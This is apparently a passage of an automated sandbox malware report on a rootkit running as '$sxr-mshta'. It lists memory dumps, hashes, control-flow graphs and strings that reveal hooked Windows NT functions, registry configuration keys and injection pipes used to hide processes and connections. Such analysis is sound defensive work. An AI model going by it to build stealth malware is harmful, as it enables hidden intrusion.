                                                                                                                      • Opcode Fuzzy Hash: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
                                                                                                                      • Instruction Fuzzy Hash: 5ED09E55A08D0686F7182FA36C9507662909B5BB61BC51034CB0A473129E3F54C94638
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
                                                                                                                      • Instruction ID: fbf6090339103f8706c32787f5a024e0f6485dd4b4e1b0993b2fb41089bd29a6
                                                                                                                      • Opcode Fuzzy Hash: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
                                                                                                                      • Instruction Fuzzy Hash: 0F51F332711A90C8FB218F76AA00BDEBBA5F34BBD4F154216FE584BA85EB38C101C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
                                                                                                                      • Instruction ID: d41e5e2ec7e375afcd4b734f3e400c7634ff8376c6f8c4fcde5e4f7add289710
                                                                                                                      • Opcode Fuzzy Hash: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
                                                                                                                      • Instruction Fuzzy Hash: 09B09214E25C02D1E604BF629CC10A152E0AB5B720FD10470C10D81120DF1EA5DE8B20
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                                      • Instruction ID: 76718d07cd2c7828e1effbd055bf188703fdcca96aec33297c295a49f92cd050
                                                                                                                      • Opcode Fuzzy Hash: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                                      • Instruction Fuzzy Hash: 34F062727552949AEBE5CF28A94275977E0F34D3C0F808619E689C3F48D33C80A09F09
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                      • API String ID: 106492572-3028563969
                                                                                                                      • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction ID: 7b9f30cc8e8fe4a9c8962c2d417534b141b9a934be96b0e57cce50772ab1ea9a
                                                                                                                      • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction Fuzzy Hash: F4713936322E11D6EB119F21E951BD9B7A4FB8FBD8F015122EA4D5BA28EF38C444C305
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                                      • API String ID: 1741086925-759476645
                                                                                                                      • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction ID: b10a1bb16b804796ac25ab0e497a0749f51296e555e1ebb15830f49bd306616e
                                                                                                                      • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction Fuzzy Hash: 1E4193BA313D0BE1EA06DF55EB55BD4AB24A70F3C4F814413B4094E166FF78828AC352
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                      • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction ID: 692739381c7e69450caaf21e8976dd9f48ebe503361453cb39051215321206d6
                                                                                                                      • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction Fuzzy Hash: A9517872315F45D7EB15CF62E64879AB7A1F38ABD0F058226EA490BB14EF38C055CB05
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                      • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                                      • API String ID: 2171963597-1213686612
                                                                                                                      • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction ID: ab226fb4db7a5a2f880efd12113e4cfc828a68b77041f9fe88609f9da7ee3fd9
                                                                                                                      • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction Fuzzy Hash: F6219032715B4182EB118F21E604799BBA0F38BBE4F504212FA5946BA8EF3CC149CB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction ID: 4e7cd0df4eb4bfa36b0e6cc546b170ab78fdfa493660d1216b5c7bf1b5fdc7e4
                                                                                                                      • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction Fuzzy Hash: 7E418233215B80DBE7618F61E5447DAB7A1F38ABD4F008126EB990BB58EF38D165CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 423 1a00aad6a90-1a00aad6a96 424 1a00aad6a98-1a00aad6a9b 423->424 425 1a00aad6ad1-1a00aad6adb 423->425 427 1a00aad6a9d-1a00aad6aa0 424->427 428 1a00aad6ac5-1a00aad6b04 call 1a00aad7140 424->428 426 1a00aad6bf8-1a00aad6c0d 425->426 432 1a00aad6c1c-1a00aad6c36 call 1a00aad6fd4 426->432 433 1a00aad6c0f 426->433 430 1a00aad6ab8 __scrt_dllmain_crt_thread_attach 427->430 431 1a00aad6aa2-1a00aad6aa5 427->431 446 1a00aad6b0a-1a00aad6b1f call 1a00aad6fd4 428->446 447 1a00aad6bd2 428->447 435 1a00aad6abd-1a00aad6ac4 430->435 437 1a00aad6aa7-1a00aad6ab0 431->437 438 1a00aad6ab1-1a00aad6ab6 call 1a00aad7084 431->438 444 1a00aad6c6f-1a00aad6ca0 call 1a00aad7310 432->444 445 1a00aad6c38-1a00aad6c6d call 1a00aad70fc call 1a00aad6f9c call 1a00aad7498 call 1a00aad72b0 call 1a00aad72d4 call 1a00aad712c 432->445 439 1a00aad6c11-1a00aad6c1b 433->439 438->435 455 1a00aad6cb1-1a00aad6cb7 444->455 456 1a00aad6ca2-1a00aad6ca8 444->456 445->439 458 1a00aad6bea-1a00aad6bf7 call 1a00aad7310 446->458 459 1a00aad6b25-1a00aad6b36 call 1a00aad7044 446->459 450 1a00aad6bd4-1a00aad6be9 447->450 461 1a00aad6cfe-1a00aad6d14 call 1a00aad28f0 455->461 462 1a00aad6cb9-1a00aad6cc3 455->462 456->455 460 1a00aad6caa-1a00aad6cac 456->460 458->426 476 1a00aad6b38-1a00aad6b5c call 1a00aad745c call 1a00aad6f8c call 1a00aad6fb8 call 1a00aad917c 459->476 477 1a00aad6b87-1a00aad6b91 call 1a00aad72b0 459->477 466 1a00aad6d9f-1a00aad6dac 460->466 479 1a00aad6d4c-1a00aad6d4e 461->479 480 1a00aad6d16-1a00aad6d18 461->480 467 1a00aad6ccf-1a00aad6cdd call 1a00aae2768 462->467 468 1a00aad6cc5-1a00aad6ccd 462->468 473 1a00aad6ce3-1a00aad6cf8 call 1a00aad6a90 467->473 490 1a00aad6d95-1a00aad6d9d 467->490 468->473 473->461 473->490 476->477 526 1a00aad6b5e-1a00aad6b65 __scrt_dllmain_after_initialize_c 476->526 477->447 499 1a00aad6b93-1a00aad6b9f call 1a00aad7300 477->499 488 1a00aad6d55-1a00aad6d6a call 1a00aad6a90 479->488 489 1a00aad6d50-1a00aad6d53 479->489 480->479 487 1a00aad6d1a-1a00aad6d3c call 1a00aad28f0 call 1a00aad6bf8 480->487 487->479 520 1a00aad6d3e-1a00aad6d46 call 1a00aae2768 487->520 488->490 508 1a00aad6d6c-1a00aad6d76 488->508 489->488 489->490 490->466 510 1a00aad6bc5-1a00aad6bd0 499->510 511 1a00aad6ba1-1a00aad6bab call 1a00aad7218 499->511 514 1a00aad6d78-1a00aad6d7f 508->514 515 1a00aad6d81-1a00aad6d91 call 1a00aae2768 508->515 510->450 511->510 525 1a00aad6bad-1a00aad6bbb 511->525 514->490 515->490 520->479 525->510 526->477 527 1a00aad6b67-1a00aad6b84 call 1a00aad9118 526->527 527->477
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: f6a1e1a64f6c52bf56c9c88361415ff2a0d919872d0a9d9d73517389ecc8422f
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 8B81DF7172264146FB57AB25AB413D923A1A78F7C4F088726BAC647FD6DB38C8C58703
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 530 1a00bdb7690-1a00bdb7696 531 1a00bdb7698-1a00bdb769b 530->531 532 1a00bdb76d1-1a00bdb76db 530->532 533 1a00bdb769d-1a00bdb76a0 531->533 534 1a00bdb76c5-1a00bdb7704 call 1a00bdb7d40 531->534 535 1a00bdb77f8-1a00bdb780d 532->535 536 1a00bdb76b8 __scrt_dllmain_crt_thread_attach 533->536 537 1a00bdb76a2-1a00bdb76a5 533->537 550 1a00bdb770a-1a00bdb771f call 1a00bdb7bd4 534->550 551 1a00bdb77d2 534->551 538 1a00bdb780f 535->538 539 1a00bdb781c-1a00bdb7836 call 1a00bdb7bd4 535->539 546 1a00bdb76bd-1a00bdb76c4 536->546 542 1a00bdb76b1-1a00bdb76b6 call 1a00bdb7c84 537->542 543 1a00bdb76a7-1a00bdb76b0 537->543 544 1a00bdb7811-1a00bdb781b 538->544 553 1a00bdb7838-1a00bdb786d call 1a00bdb7cfc call 1a00bdb7b9c call 1a00bdb8098 call 1a00bdb7eb0 call 1a00bdb7ed4 call 1a00bdb7d2c 539->553 554 1a00bdb786f-1a00bdb78a0 call 1a00bdb7f10 539->554 542->546 562 1a00bdb77ea-1a00bdb77f7 call 1a00bdb7f10 550->562 563 1a00bdb7725-1a00bdb7736 call 1a00bdb7c44 550->563 555 1a00bdb77d4-1a00bdb77e9 551->555 553->544 564 1a00bdb78a2-1a00bdb78a8 554->564 565 1a00bdb78b1-1a00bdb78b7 554->565 562->535 583 1a00bdb7738-1a00bdb775c call 1a00bdb805c call 1a00bdb7b8c call 1a00bdb7bb8 call 1a00bdb9d7c 563->583 584 1a00bdb7787-1a00bdb7791 call 1a00bdb7eb0 563->584 564->565 570 1a00bdb78aa-1a00bdb78ac 564->570 571 1a00bdb78b9-1a00bdb78c3 565->571 572 1a00bdb78fe-1a00bdb7903 565->572 579 1a00bdb799f-1a00bdb79ac 570->579 573 1a00bdb78cf-1a00bdb78dd call 1a00bdc3368 571->573 574 1a00bdb78c5-1a00bdb78cd 571->574 578 1a00bdb7906 call 1a00bdb34f0 572->578 580 1a00bdb78e3-1a00bdb78f8 call 1a00bdb7690 573->580 595 1a00bdb7995-1a00bdb799d 573->595 574->580 585 1a00bdb790b-1a00bdb7914 578->585 580->572 580->595 583->584 632 1a00bdb775e-1a00bdb7765 __scrt_dllmain_after_initialize_c 583->632 584->551 603 1a00bdb7793-1a00bdb779f call 1a00bdb7f00 584->603 591 1a00bdb794c-1a00bdb794e 585->591 592 1a00bdb7916-1a00bdb7918 585->592 593 1a00bdb7950-1a00bdb7953 591->593 594 1a00bdb7955-1a00bdb796a call 1a00bdb7690 591->594 592->591 600 1a00bdb791a-1a00bdb791f 592->600 593->594 593->595 594->595 612 1a00bdb796c-1a00bdb7976 594->612 595->579 605 1a00bdb7922 call 1a00bdb34f0 600->605 620 1a00bdb77a1-1a00bdb77ab call 1a00bdb7e18 603->620 621 1a00bdb77c5-1a00bdb77d0 603->621 611 1a00bdb7927-1a00bdb793c call 1a00bdb77f8 605->611 611->591 624 1a00bdb793e-1a00bdb7946 call 1a00bdc3368 611->624 617 1a00bdb7978-1a00bdb797f 612->617 618 1a00bdb7981-1a00bdb7991 call 1a00bdc3368 612->618 617->595 618->595 620->621 633 1a00bdb77ad-1a00bdb77bb 620->633 621->555 624->591 632->584 634 1a00bdb7767-1a00bdb7784 call 1a00bdb9d18 632->634 633->621 634->584
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 991759b8c839dfd8723ac9faaf9260e70b50ca09e76899cdacf9244bbbb1fa12
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 14819C30706E42C7FA569F669A41BD9E691ABCF7C0F064427B9088F796FB38CC418706
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                      • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction ID: 4169dbb03fa2d6595903e1f8eeeddba1abd77cf4161ab39a284232f04e31bf25
                                                                                                                      • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction Fuzzy Hash: CB316F31313E91D1EE539F129550BD9A394BB4FBE0F5A5526BE194E344FF38C4458312
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
• Instruction ID: 1024b168949dea4e5982153c9c03b1275ad0d31baafafafb68ec3efb7de548d6
• Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
• Instruction Fuzzy Hash: F7118B32311F4186E7528F46EA44399EAA0F78FBE4F008226FA1D8B794EF38C814C745
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
• Instruction ID: bd97341ad54c0d057f0d2b5a1a53f6d717d439d543e09bfa160b299a117a6a37
• Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
• Instruction Fuzzy Hash: 25D1BC36209F48C6DA719F1AE59079AB7A0F3DEBC8F110116EA8D4B7A5DF38C541CB05
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: $sxr
• API String ID: 756756679-21942930
• Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
• Instruction ID: 33eb3282b218c19cc78fa336cd433ee6a73873a1329783a7bb5af254aea10028
• Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
• Instruction Fuzzy Hash: B4319131702F51C6E7169F56AA40BA9B7A0FB4BBE4F098022AF490BB54FF38C4658705
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
• Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
• Instruction ID: 1e0d3b01b18e3688dbf7abcd0e9e32befc408565b2e96a9a683a8969ea94d6fa
• Opcode Fuzzy Hash: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
• Instruction Fuzzy Hash: 00116322604F418AEB00EF71E8842A973E4FB0B768FC00A35EA5D47754DF7DD5A88350
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
• Instruction ID: 0d3655745c4bd35511f8e0446bd8bdc0053fb94c230b7bf30974b846344ff083
• Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
• Instruction Fuzzy Hash: C0015B31301F4296EA11DF12A558799A7A1FB8EFD0F488036EE894B754EF38C986C749
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
• Instruction ID: e5c9743fec3e8dea7fb27fc985ab4ff0a34a921c802a436df98a624ccde7c64f
• Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
• Instruction Fuzzy Hash: 5E113C79702F4186FB669F25E6487A5B7A0BB4FBD1F044426E9490A354FF3DC008D706
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
• Instruction ID: 88d2c35e27e07476da248665ea38b5e5c73228512c8fa663cb3dae108a44664b
• Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
• Instruction Fuzzy Hash: 76518F32712E80CAEB16CF15E654F99B795F38BBD4F568126EB064B788EB38C841C705
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
• Instruction ID: 2dae5752eb1238cd66e2d1fbdd6d7ba0a15588768efd58fc291d8b502ad4714a
• Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
• Instruction Fuzzy Hash: B8F08172311E41D2E7618F10E6947D9AB60F74BBD8F848022EA494A554EF3CC688C705
Uniqueness

